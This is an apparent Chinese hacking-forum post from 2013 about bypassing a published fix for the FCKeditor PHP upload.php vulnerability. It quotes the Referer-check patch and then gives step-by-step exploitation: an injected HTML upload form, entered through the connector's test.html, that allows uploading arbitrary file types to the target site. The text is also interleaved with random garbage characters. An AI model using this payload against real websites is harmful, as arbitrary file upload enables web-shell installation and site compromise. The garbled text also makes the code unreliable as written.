找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2278|回复: 0
打印 上一主题 下一主题

fckeditor 漏洞修复后的二次利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:12:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
1 g$ }8 \6 C0 V2 y% G6 b" M: Z网上给出的修复方案是
& k0 l) M' p, L- V* m3 P/ A% }修复方法,删除FCK编辑器用其他的编辑器
* s; Z3 I5 q) e9 V或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
; V4 @1 l0 x6 C% d' P& c. s4 Y$ o  i+ d& {8 V4 o
require(‘config.php’);4 y; e8 v3 F+ B/ e7 d! A+ [
require(‘util.php’);
* i; e7 E1 H# A3 v. h) v2 _: E: V的下面添加以下代码—————————–' t, m5 P* t( _6 y( v/ e2 m  j: I
//防止外部提交
+ m* A' h0 T# mfunction outsidepost()2 j4 q7 a7 q5 x& b3 I' \1 o
{  W4 l9 o, R; w' I
$servername=$_SERVER['SERVER_NAME'];
. _* ]4 G4 I* A( J" K  _. r$sub_from=@$_SERVER['HTTP_REFERER'];
3 i; j; r: l' e8 k1 X$sub_len=strlen($servername);! \) R$ w2 x6 t* P, o& ^4 D" w8 V% x/ S
$checkfrom=substr($sub_from,7,$sub_len);" K( V2 m9 y& v6 d$ J
if($checkfrom!=$servername){+ N' [" K! R8 F7 o6 V, T# T4 u5 s
echo(“you don’t outsidepost!”);. C# x) m/ r: ~; H3 t+ k1 I
exit;
4 B. [. l" h2 ]" {, x" `& {}$ @- m7 ~# N) r  o
}  W4 K+ H& G2 {7 Y
outsidepost();+ j- m9 z9 T8 B2 Y0 f4 {
防止外部提交,但是没有防止内部提交,7 P6 q, ?! V7 a+ t: N3 ]
利用方法:# y/ H' N9 _0 L: a
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
7 a2 i+ K8 G: A0 e4 @2,在Current Folder 框输入
. ~5 v' |" b* y3 r4 m& V( ]5 s) v<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>- ]: |4 b) r' V, c0 q' E
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。& H+ O* q9 }4 F7 Y- s( b
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表